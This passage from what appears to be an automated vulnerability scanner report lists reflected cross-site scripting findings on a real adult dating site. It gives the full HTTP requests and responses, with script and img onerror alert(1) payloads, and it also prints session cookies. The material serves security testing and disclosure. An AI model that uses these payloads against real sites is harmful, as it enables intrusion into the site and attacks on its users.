<p>The requested URL /adult603f5<script>alert(1)</script>9231a5dc3b1/personals-dating/search.php was not found on this server.</p>
...[SNIP]...

2.189. http://www.resellerbase.com/adult/personals-dating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ef327<script>alert(1)</script>cbda9c6b9a2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-datingef327<script>alert(1)</script>cbda9c6b9a2/search.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-datingef327<script>alert(1)</script>cbda9c6b9a2/search.php was not found on this server.</p>
...[SNIP]...

2.190. http://www.resellerbase.com/adult/personals-dating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dda2b<script>alert(1)</script>ee0504dcb69 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/search.phpdda2b<script>alert(1)</script>ee0504dcb69 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/search.phpdda2b<script>alert(1)</script>ee0504dcb69 was not found on this server.</p>
...[SNIP]...

2.191. http://www.resellerbase.com/adult/personals-dating/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 7961e<a>bf4d8d44fa0 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/personals-dating/search.php?keyword=search...&Submit3=Search7961e<a>bf4d8d44fa0&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/search.php?keyword=search...&Submit3=Search7961e<a>bf4d8d44fa0&opt=2 was not found on this server.</p>
...[SNIP]...

2.192. http://www.resellerbase.com/adult/personals-dating/search.php [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/search.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 560fa"><img%20src%3da%20onerror%3dalert(1)>9c6fad0d53e5ede0b was submitted in the cat parameter. This input was echoed as 560fa\"><img src=a onerror=alert(1)>9c6fad0d53e5ede0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /adult/personals-dating/search.php?cat=13560fa"><img%20src%3da%20onerror%3dalert(1)>9c6fad0d53e5ede0b&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/search.php?cat=13&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:32:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 15044

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=13560fa\"><img src=a onerror=alert(1)>9c6fad0d53e5ede0b">
...[SNIP]...

2.193. http://www.resellerbase.com/adult/personals-dating/search.php [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/search.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9646"><img%20src%3da%20onerror%3dalert(1)>9747fc21928 was submitted in the cat parameter. This input was echoed as e9646\"><img src=a onerror=alert(1)>9747fc21928 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /adult/personals-dating/search.php?cat=13e9646"><img%20src%3da%20onerror%3dalert(1)>9747fc21928&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:32:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 15014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=13e9646\"><img src=a onerror=alert(1)>9747fc21928">
...[SNIP]...

2.194. http://www.resellerbase.com/adult/personals-dating/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload bb656<a>0656bacf859 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/personals-dating/search.php?keyword=search...bb656<a>0656bacf859&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/search.php?keyword=search...bb656<a>0656bacf859&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.195. http://www.resellerbase.com/adult/personals-dating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7ab33<script>alert(1)</script>7aa4926eece was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/search.php?7ab33<script>alert(1)</script>7aa4926eece=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/search.php?7ab33<script>alert(1)</script>7aa4926eece=1 was not found on this server.</p>
...[SNIP]...

2.196. http://www.resellerbase.com/adult/personals-dating/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 2e9a6<a>3b35bdc676b was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/personals-dating/search.php?keyword=search...&Submit3=Search&opt=22e9a6<a>3b35bdc676b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/search.php?keyword=search...&Submit3=Search&opt=22e9a6<a>3b35bdc676b was not found on this server.</p>
...[SNIP]...

2.197. http://www.resellerbase.com/adult/personals-dating/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b4c84<script>alert(1)</script>3fb7c9cf3cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adultb4c84<script>alert(1)</script>3fb7c9cf3cd/personals-dating/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adultb4c84<script>alert(1)</script>3fb7c9cf3cd/personals-dating/themes/ was not found on this server.</p>
...[SNIP]...

2.198. http://www.resellerbase.com/adult/personals-dating/themes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 13ebe<script>alert(1)</script>a5a428dde94 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating13ebe<script>alert(1)</script>a5a428dde94/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating13ebe<script>alert(1)</script>a5a428dde94/themes/ was not found on this server.</p>
...[SNIP]...

2.199. http://www.resellerbase.com/adult/personals-dating/themes/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 97488<script>alert(1)</script>4e8f042eb74 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes97488<script>alert(1)</script>4e8f042eb74/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes97488<script>alert(1)</script>4e8f042eb74/ was not found on this server.</p>
...[SNIP]...

2.200. http://www.resellerbase.com/adult/personals-dating/themes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 59668<script>alert(1)</script>bf0669f4bf8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/?59668<script>alert(1)</script>bf0669f4bf8=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/?59668<script>alert(1)</script>bf0669f4bf8=1 was not found on this server.</p>
...[SNIP]...

2.201. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 26b21<script>alert(1)</script>29b9308fcc1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult26b21<script>alert(1)</script>29b9308fcc1/personals-dating/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult26b21<script>alert(1)</script>29b9308fcc1/personals-dating/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.202. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f91f9<script>alert(1)</script>470dd69a419 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-datingf91f9<script>alert(1)</script>470dd69a419/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-datingf91f9<script>alert(1)</script>470dd69a419/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.203. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5d1c5<script>alert(1)</script>ac06ce9c40f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes5d1c5<script>alert(1)</script>ac06ce9c40f/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes5d1c5<script>alert(1)</script>ac06ce9c40f/kosmos/ was not found on this server.</p>
...[SNIP]...

2.204. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6c338<script>alert(1)</script>423da27136b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos6c338<script>alert(1)</script>423da27136b/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos6c338<script>alert(1)</script>423da27136b/ was not found on this server.</p>
...[SNIP]...

2.205. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload cd407<script>alert(1)</script>fb6d51ce697 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/kosmos/?cd407<script>alert(1)</script>fb6d51ce697=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/?cd407<script>alert(1)</script>fb6d51ce697=1 was not found on this server.</p>
...[SNIP]...

2.206. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 836c7<script>alert(1)</script>5a2c980ea78 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult836c7<script>alert(1)</script>5a2c980ea78/personals-dating/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult836c7<script>alert(1)</script>5a2c980ea78/personals-dating/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.207. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4b794<script>alert(1)</script>451e90305c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating4b794<script>alert(1)</script>451e90305c4/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
